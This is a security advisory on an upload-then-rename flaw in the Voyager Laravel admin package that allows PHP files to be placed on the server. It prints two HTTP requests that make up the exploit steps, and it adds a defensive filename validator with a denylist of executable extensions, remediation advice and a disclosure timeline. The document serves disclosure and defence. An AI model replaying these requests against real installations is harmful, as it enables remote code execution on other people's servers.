#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Voyager
# Vendor:   The Control Group (Open Source)
# CSNC ID:  CSNC-2018-37
# Subject:  Arbitrary File Upload (RCE)
# Risk:     Medium (CVSS 3.0 Base Score: 5.4)
# CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N/E:P/RL:O/RC:C
# Effect:   Remotely exploitable
# Author:   Fabio Poloni
# Date:     07.11.2018
#
#############################################################

Introduction
------------

Voyager [1] is a Laravel Admin Package that includes BREAD (CRUD) operations,
a media manager, menu builder, and much more. For uploading files there is a
media manager, which can upload, rename and delete files on the filesystem.
The manager can be abused to upload executable PHP files.

Affected
--------

Vulnerable:

* Version 1.1.10

Other versions were not tested.

Technical Description
---------------------

The Media Manager can be used to upload PHP files. Neither the content nor the
content type is checked; however, the .php extension is removed from the
uploaded file.

````
POST /admin/media/upload HTTP/1.1
Host: localhost:8000
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------178790972713939268652054415808
Content-Length: 510
Cookie: XSRF-TOKEN=[...]; laravel_session=[...]
Connection: close

-----------------------------178790972713939268652054415808
Content-Disposition: form-data; name="_token"

[...]
-----------------------------178790972713939268652054415808
Content-Disposition: form-data; name="upload_path"

-----------------------------178790972713939268652054415808
Content-Disposition: form-data; name="file"; filename="phpinfo.php"
Content-Type: text/plain

-----------------------------178790972713939268652054415808--
````

To make the file "executable" again for a standard web server, it can be
renamed to a new filename that includes the .php extension; the rename
endpoint does not validate the new name:

````
POST /admin/media/rename_file HTTP/1.1
Host: localhost:8000
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-TOKEN: [...]
X-Requested-With: XMLHttpRequest
Content-Length: 123
Cookie: XSRF-TOKEN=[...]; laravel_session=[...]
Connection: close

filename=F0qv19ge4my0PwxcThdFMatyylQISnaH7FksTSyI.&new_filename=phpinfo.php&_token=[...]
````

The file can then be accessed as expected at
"http://example.com/storage/phpinfo.php".

Vulnerability Classification
----------------------------

* CVSS v3.0 Base Score: 5.4
* CVSS v3.0 Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N/E:P/RL:O/RC:C

Remediation
-----------

Update to the latest release (1.2.0). Please see Voyager releases [2] for
release notes and download links.
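The weakness above is that the extension check happens only at upload time, while the rename endpoint accepts any new name. The following is an added example written for this advisory, not Voyager's own code and not the fix from the vendor's pull request: a single target-filename validator that a media manager would apply to both the upload and the rename path, so that a stored file can never acquire a server-executable extension. The extension list, the function names and the sample names are this example's own assumptions.

```php
<?php
// Added example (not Voyager's code): one filename validator shared by the
// upload and the rename handler of a media manager. Rejecting executable
// extensions only on upload is what the advisory shows being bypassed.
declare(strict_types=1);

/** Extensions a typical web server may hand to a script interpreter (assumed list). */
const EXECUTABLE_EXTENSIONS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phps', 'phtml', 'phar',
    'phpt', 'pht', 'cgi', 'pl', 'py', 'sh', 'htaccess', 'htpasswd',
];

/**
 * Returns true when $name is acceptable as a file name inside the public
 * storage directory; false for anything that could become executable or
 * escape the directory.
 */
function isSafeTargetFilename(string $name): bool
{
    if ($name === '' || strlen($name) > 255) {
        return false;
    }
    // Must be a bare file name: no path separators, NUL bytes or control chars.
    if (preg_match('~[\x00-\x1f\x7f/\\\\]~', $name) === 1) {
        return false;
    }
    // No dotfiles (.htaccess) and no "." / ".." entries.
    if ($name[0] === '.') {
        return false;
    }

    // Check every dot-separated component after the base name, not only the
    // last one: with mod_mime style handlers "x.php.jpg" can still be run as
    // PHP, and a trailing "." (as in the stored name in the advisory) leaves
    // an empty component that we also refuse.
    $parts = explode('.', strtolower($name));
    array_shift($parts); // drop the base name
    foreach ($parts as $ext) {
        $ext = rtrim($ext); // "php " -> "php"
        if ($ext === '' || in_array($ext, EXECUTABLE_EXTENSIONS, true)) {
            return false;
        }
    }
    return true;
}

/**
 * Guard a rename handler could call before touching the filesystem.
 * Returns the accepted name or throws, so the caller cannot forget the check.
 */
function validatedRenameTarget(string $newFilename): string
{
    if (!isSafeTargetFilename($newFilename)) {
        throw new InvalidArgumentException('Rejected target filename');
    }
    return $newFilename;
}

// Constructed sample names: the first is the rename target from the advisory,
// the second the trailing-dot name the upload left behind.
$samples = [
    'phpinfo.php'                                => false,
    'F0qv19ge4my0PwxcThdFMatyylQISnaH7FksTSyI.'  => false,
    'report.PHP'                                 => false,
    'image.php.jpg'                              => false,
    'image.phtml'                                => false,
    '.htaccess'                                  => false,
    '../x.txt'                                   => false,
    'holiday.jpg'                                => true,
    'notes.txt'                                  => true,
];
foreach ($samples as $name => $expected) {
    $result = isSafeTargetFilename($name);
    printf("%-45s %s\n", $name, $result === $expected ? 'ok' : 'MISMATCH');
}
```

Two design points matter more than the exact list: the same function runs on every operation that chooses a final name (upload, rename, move), and extensions are checked component by component rather than by looking at the last one only, since web server handler configuration, not the application, decides what is executed. A denylist like this is a backstop; storing uploads outside the web root or on a host that serves them as static content is the stronger control.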
Timeline
--------

2019-03-05: According to the vendor, the vulnerability has been addressed
            (https://github.com/the-control-group/voyager/pull/3820)
2018-12-20: Vulnerabilities confirmed
2018-12-18: Fifth contact attempt via email to a former and current maintainer,
            response received
2018-11-23: Fourth contact attempt via email (hello@thecontrolgroup.com) and
            direct contact to an employee on LinkedIn
2018-11-16: Third contact attempt via email (hello@thecontrolgroup.com)
2018-11-14: Second contact attempt via Twitter (@ControlGroup_SD)
2018-11-07: Initial vendor notification via contact form
            (https://thecontrolgroup.com/contact)
2018-11-05: Discovery by Fabio Poloni

References
----------

[1] https://github.com/the-control-group/voyager
[2] https://github.com/the-control-group/voyager/releases